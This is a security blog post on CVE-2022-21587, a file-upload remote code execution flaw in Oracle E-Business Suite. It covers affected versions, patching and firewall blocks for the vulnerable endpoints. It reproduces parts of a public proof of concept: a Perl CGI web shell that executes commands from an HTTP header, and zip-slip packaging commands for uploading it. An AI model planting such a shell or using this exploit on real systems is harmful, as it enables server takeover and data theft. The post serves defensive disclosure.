Are you an Oracle Administrator? If so, make sure you don't miss out on version 12.2.12 update of Oracle E-Business Suite, released in October 2022.

For those who are unfamiliar, E-Business Suite (EBS) is a comprehensive suite of enterprise resource planning (ERP) and customer relationship management (CRM) applications developed by Oracle Corporation.

Even though there is very little to find about CVE-2022-21587 in the official registers such as NVD or CVE, it’s seems like the flaw was discovered by a security researcher who goes by pseudonym @l1k3beef, according to the credits given by Oracle in the Critical Patch Update Advisory - October 2022.

The vulnerability

Oracle EBS component Web Applications Desktop (WAD) Integrator handled uploaded files in a manner that caused an input validation flaw, resulting in a 9.8 Base Score vulnerability.

WAD is a useful tool for companies that use EBS and MS Office applications and need to integrate data between them.

The attacker could achieve arbitrary code execution by sending a specifically crafted HTTP request that includes the malicious file. Additionally, the attacker may be able to take over the entire local network by repeating the process from one node to another, leading to a larger-scale breach and resulting in data theft, data tampering, or worse.

Who’s affected?

The affected Oracle E-Business Suite versions are 12.2.3 to 12.2.11.

Have in mind that the version 12.2.3 has been released in December 2013, making this issue a ticking time bomb for the past 9 years.

In version 12.2.12, this vulnerability has finally been patched.

The exploit

This is a POC (Proof of Concept) that was written by hieuminhnv in Python that exploits CVE-2022-21587.

The Perl code for a Common Gateway Interface (CGI) is stored in the shell variable, and it reads an HTTP command from the HTTP_CMD variable and executes it. The Write_Shell() function is then used to write this Perl code to a file called txkFNDWRR.pl.

shell = '''
use CGI;
print CGI::header( -type => 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;
'''

def Write_Shell():
with open("txkFNDWRR.pl", "w") as f:
f.writelines("%s \n" %(shell))
os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")
os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")

The txkFNDWRR.pl file is then zipped and uuencoded to create a malicious file that can be uploaded to the vulnerable endpoint. This is done by the following two lines:

os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")
os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")

The resulting file is named t.uue and is used to upload the malicious file to the Oracle EBS system in the exploit() function using the requests.post() method.

def exploit():
Write_Shell()
host = sys.argv[1]
# # some code
#
request = requests.post(url,files=up)
if request.status_code == 200:
print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')

Mitigation

Organizations and individuals can safeguard themselves against the CVE-2022-21587 by making sure that all their systems are updated with the latest version of Oracle EBS, containing a patch that addresses the vulnerability.

If for whatever reason you cannot update your Oracle EBS, there is a hot-fix you can perform.

To temporarily protect yourself from CVE-2022-21587 or other similar threats, all you need to do is block these requests in your firewall:

/OA_HTML/BneUploaderService
/OA_HTML/BneViewerXMLService
/OA_HTML/BneDownloadService
/OA_HTML/BneOfflineLOVService

Conclusion

Enforcing strict access controls and continuously monitoring networks for suspicious activities can also help prevent unauthorized access.

Generally, keeping software up to date will decrease the system's attack surface and reduce the likelihood of vulnerabilities being exploited by attackers.

Finally, it's crucial to stay informed about the latest security threats and vulnerabilities in order to be able to take appropriate measures to protect your system.
Subscribing to DataGrid Surface can help you stay up-to-date on the latest developments in the world of CyberSecurity and Tech


Subscribe to be updated on the new content!

Subscription Form (#4)